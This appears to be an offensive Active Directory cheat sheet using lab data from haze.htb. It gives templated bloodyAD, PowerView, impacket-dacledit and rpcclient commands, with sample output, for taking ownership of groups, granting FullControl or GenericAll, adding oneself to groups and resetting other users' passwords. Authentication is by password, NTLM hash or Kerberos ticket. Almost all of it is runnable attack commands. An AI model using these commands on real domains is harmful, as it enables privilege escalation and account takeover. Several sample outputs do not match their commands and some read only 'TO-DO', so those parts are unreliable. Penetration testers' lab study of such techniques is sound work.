Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Authentication Method
Change Owner of the Group/User
1. Change Owner
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> set owner '<TARGET_IDENTITY>' '<TARGET_USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' --host dc01.haze.htb set owner 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by haze-it-backup$ on SUPPORT_SERVICES
# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> set owner '<TARGET_IDENTITY>' '<TARGET_USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 --host dc01.haze.htb set owner 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by haze-it-backup$ on SUPPORT_SERVICES
# Password-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> set owner '<TARGET_IDENTITY>' '<TARGET_USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' -k --host dc01.haze.htb set owner 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by haze-it-backup$ on SUPPORT_SERVICES
# NTLM-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> set owner '<TARGET_IDENTITY>' '<TARGET_USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p '735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 -k --host dc01.haze.htb set owner 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by haze-it-backup$ on SUPPORT_SERVICES
# Ticket-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> set owner '<TARGET_IDENTITY>' '<TARGET_USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -k --host dc01.haze.htb set owner 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by haze-it-backup$ on SUPPORT_SERVICES
1. Connect
# Password
powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>'
Sample Output:
$ powerview 'haze.htb/haze-it-backup$:Password123!@DC01.haze.htb'
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
# NTLM
powerview '<DOMAIN>/<USER>@<TARGET>' -H '<HASH>'
Sample Output:
$ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -H '735c02c6b2dc54c3c8c6891f55279ebc'
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
# Password-based Kerberos
powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -k
Sample Output:
$ powerview 'haze.htb/haze-it-backup$:Password123!@DC01.haze.htb' -k
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
# NTLM-based Kerberos
powerview '<DOMAIN>/<USER>@<TARGET>' -H '<HASH>' -k
Sample Output:
$ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -H '735c02c6b2dc54c3c8c6891f55279ebc' -k
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
# Ticket-based Kerberos
powerview '<DOMAIN>/<USER>@<TARGET>' -k
Sample Output:
$ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -k --no-pass
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯
2. Change Owner
Set-DomainObjectOwner -TargetIdentity '<TARGET_IDENTITY>' -PrincipalIdentity '<TARGET_USER>'
Sample Output:
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯ Set-DomainObjectOwner -TargetIdentity 'SUPPORT_SERVICES' -PrincipalIdentity 'haze-it-backup$'
[2025-10-31 21:39:34] [Set-DomainObjectOwner] Changing current owner S-1-5-21-323145914-28650650-2368316563-512 to S-1-5-21-323145914-28650650-2368316563-1111
[2025-10-31 21:39:34] [Set-DomainObjectOwner] Success! modified owner for CN=Support_Services,CN=Users,DC=haze,DC=htb
1. Import PowerView
. .\PowerView.ps1
Sample Output:
evil-winrm-py PS C:\programdata> . .\PowerView.ps1
2. Change Owner
Set-DomainObjectOwner -Identity '<TARGET_IDENTITY>' -OwnerIdentity '<TARGET_USER>'
Sample Output:
evil-winrm-py PS C:\programdata> Set-DomainObjectOwner -Identity 'SUPPORT_SERVICES' -OwnerIdentity 'haze-it-backup$'
Add User to the Group
1. Add Full Control to the User Over the Group
# Password
impacket-dacledit '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output:
$ impacket-dacledit 'haze.htb/haze-it-backup$:Password123!' -dc-ip dc01.haze.htb -principal 'haze-it-backup$' -target 'SUPPORT_SERVICES' -inheritance -action write -rights FullControl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20251031-215454.bak
[*] DACL modified successfully!
# NTLM
impacket-dacledit '<DOMAIN>/<USER>' -hashes ':<HASH>' -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output:
$ impacket-dacledit 'haze.htb/haze-it-backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip dc01.haze.htb -principal 'haze-it-backup$' -target 'SUPPORT_SERVICES' -inheritance -action write -rights FullControl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20251031-215454.bak
[*] DACL modified successfully!
# Password-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-dacledit '<DOMAIN>/<USER>:<PASSWORD>' -k -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output:
$ sudo ntpdate -s 10.129.232.50 && impacket-dacledit 'haze.htb/haze-it-backup$:Password123!' -k -dc-ip dc01.haze.htb -principal 'haze-it-backup$' -target 'SUPPORT_SERVICES' -inheritance -action write -rights FullControl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20251031-220251.bak
[*] DACL modified successfully!
# NTLM-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-dacledit '<DOMAIN>/<USER>' -hashes ':<HASH>' -k -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output:
$ sudo ntpdate -s 10.129.232.50 && impacket-dacledit 'haze.htb/haze-it-backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -k -dc-ip dc01.haze.htb -principal 'haze-it-backup$' -target 'SUPPORT_SERVICES' -inheritance -action write -rights FullControl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20251031-220251.bak
[*] DACL modified successfully!
# Ticket-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-dacledit '<DOMAIN>/<USER>' -k -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output:
$ sudo ntpdate -s 10.129.232.50 && impacket-dacledit 'haze.htb/haze-it-backup$' -k -dc-ip dc01.haze.htb -principal 'haze-it-backup$' -target 'SUPPORT_SERVICES' -inheritance -action write -rights FullControl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20251031-220251.bak
[*] DACL modified successfully!
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# Password-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# NTLM-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p '735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# Ticket-based Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
Add-DomainObjectAcl -TargetIdentity '<TARGET_IDENTITY>' -PrincipalIdentity '<USER>' -Rights fullcontrol
Sample Output:
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯ Add-DomainObjectAcl -TargetIdentity 'SUPPORT_SERVICES' -PrincipalIdentity 'haze-it-backup$' -Rights fullcontrol
[2025-10-31 22:15:34] [Add-DomainObjectACL] Found target identity: CN=Support_Services,CN=Users,DC=haze,DC=htb
[2025-10-31 22:15:34] [Add-DomainObjectACL] Found principal identity: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
[2025-10-31 22:15:34] Adding FullControl to S-1-5-21-323145914-28650650-2368316563-1112
[2025-10-31 22:15:34] [Add-DomainObjectACL] Success! Added ACL to CN=Support_Services,CN=Users,DC=haze,DC=htb
2. Add User to the Group
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# Password-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# NTLM-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p '735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# Ticket-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$'
[+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>'
Sample Output:
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯ Add-DomainObjectAcl -TargetIdentity 'SUPPORT_SERVICES' -PrincipalIdentity 'haze-it-backup$' -Rights fullcontrol
[2025-10-31 22:23:23] [Add-DomainObjectACL] Found target identity: CN=Support_Services,CN=Users,DC=haze,DC=htb
[2025-10-31 22:23:23] [Add-DomainObjectACL] Found principal identity: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
[2025-10-31 22:23:23] Adding FullControl to S-1-5-21-323145914-28650650-2368316563-1112
[2025-10-31 22:23:23] [Add-DomainObjectACL] Success! Added ACL to CN=Support_Services,CN=Users,DC=haze,DC=htb
3. Check
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> get object '<GROUP>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:42:14+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> get object '<GROUP>'
Sample Output:
$ bloodyAD -d haze.htb -u 'haze-it-backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:42:14+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
# Password-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> get object '<GROUP>'
Sample Output:
$ sudo ntpdate -s 10.129.31.115 && bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' -k --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:46:22+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
# NTLM-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> get object '<GROUP>'
Sample Output:
$ sudo ntpdate -s 10.129.31.115 && bloodyAD -d haze.htb -u 'haze-it-backup$' -p '735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 -k --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:46:22+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
# Ticket-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> get object '<GROUP>'
Sample Output:
$ sudo ntpdate -s 10.129.31.115 && bloodyAD -d haze.htb -u 'haze-it-backup$' -k --host dc01.haze.htb get object 'SUPPORT_SERVICES'
distinguishedName: CN=Support_Services,CN=Users,DC=haze,DC=htb
cn: Support_Services
dSCorePropagationData: 2025-10-31 22:46:22+00:00
groupType: -2147483646
instanceType: 4
member: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
---[SNIP]---
Get-DomainGroupMember -Identity '<GROUP>'
Sample Output:
╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>]
╰─PV ❯ Get-DomainGroupMember -Identity 'Support_Services'
GroupDomainName : Support_Services
GroupDistinguishedName : CN=Support_Services,CN=Users,DC=haze,DC=htb
MemberDomain : haze.htb
MemberName : Haze-IT-Backup$
MemberDistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
MemberSID : S-1-5-21-323145914-28650650-2368316563-1111
1. Import PowerView.ps1
. .\PowerView.ps1
Sample Output:
evil-winrm-py PS C:\programdata> . .\PowerView.ps1
2. Add Full Control to the User Over the Group
Add-DomainObjectAcl -TargetIdentity '<GROUP>' -PrincipalIdentity '<USER>' -Rights All -DomainController <DC>
Sample Output:
evil-winrm-py PS C:\programdata> Add-DomainObjectAcl -TargetIdentity 'SUPPORT_SERVICES' -PrincipalIdentity 'haze-it-backup$' -Rights All -DomainController dc01.haze.htb
4. Add User to the Group
Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>' -Credential $cred
Sample Output:
evil-winrm-py PS C:\programdata> Add-DomainGroupMember -Identity 'SUPPORT_SERVICES' -Members 'haze-it-backup$'
5. Check
Get-DomainGroupMember -Identity '<GROUP>' -Domain <DOMAIN> -DomainController <DC> -Credential $cred | fl MemberName
Sample Output:
evil-winrm-py PS C:\programdata> Get-DomainGroupMember -Identity 'SUPPORT_SERVICES' -Domain haze.htb -DomainController dc01.haze.htb | fl MemberName
MemberName : Haze-IT-Backup$
Change Target User Password
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output:
TO-DO# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output:
TO-DO# Password-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output:
TO-DO# NTLM-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output:
TO-DO# Ticket-based Kerberos
sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output:
TO-DORef: bloodyAD
# Password
rpcclient -U '<DOMAIN>/<USER>%<PASSWORD>' <TARGET> -c 'setuserinfo2 <TARGET_USER> 23 <NEW_PASSWORD>'
Sample Output:
$ rpcclient -U 'object.local/oliver%c1cdfun_d2434' 10.10.11.132 -c 'setuserinfo2 smith 23 Password123!'
Set-ADAccountPassword -Identity "<TARGET_USER>" -NewPassword (ConvertTo-SecureString "<NEW_PASSWORD>" -AsPlainText -Force) -Reset
Sample Output:
TO-DO1. Import PowerView
. .\PowerView.ps1
Sample Output:
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1
2. Change Target User Password
$password = ConvertTo-SecureString '<NEW_PASSWORD>' -AsPlainText -Force
Sample Output:
*Evil-WinRM* PS C:\programdata> $password = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword $password
Sample Output:
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity gibdeon -AccountPassword $password